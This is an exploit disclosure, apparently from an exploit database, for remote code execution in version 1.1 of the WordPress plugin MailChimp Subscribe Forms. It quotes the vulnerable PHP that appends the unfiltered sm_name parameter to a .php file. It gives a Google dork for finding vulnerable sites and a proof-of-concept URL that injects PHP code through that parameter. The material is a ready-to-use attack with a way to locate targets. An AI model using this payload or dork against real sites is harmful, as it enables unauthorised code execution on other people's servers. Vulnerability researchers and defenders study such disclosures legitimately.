MailChimp_RCE.txt

# Exploit Title: Wordpress Plugin MailChimp Subscribe Forms - Remote Code Execution
# Date: 23-03-2016
# Exploit Author: CrashBandicot
# Google Dork : inurl:/wp-content/plugins/mailchimp-subscribe-sm/
# Vendor Homepage: https://fr.wordpress.org/plugins/mailchimp-subscribe-sm/
# Tested on: MSWin32
# Version: 1.1

# Vulnerability in GET
# Put your mail for subscribe and send but add in URL the Parameter sm_name with PHP Code

# Vulnerable Files : mailchimp-subscribe-sm/inc/store-address.php

18.   if(!preg_match("/^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*$/i", $_GET['sm_email'])) {
...
23.        $smf_data  = '* Name : '.$_GET['sm_name'];
24.      $smf_data .= ' Email : '.$_GET['sm_email'].' , '. PHP_EOL;
...
36.      $file = "sm_subscribers_list.php"; 
...
39.  $fp = fopen($file, "a"); 
40.     fwrite($fp, $smf_data);
...
42.       fclose($fp);

# PoC : localhost/subscribe/?sm_email=0day@0day.com&sm_name=<?php phpinfo(); ?>&submit=subscribe

# Result in file sm_subscribers_list.php

# PicS : http://i.imgur.com/HHtuycC.png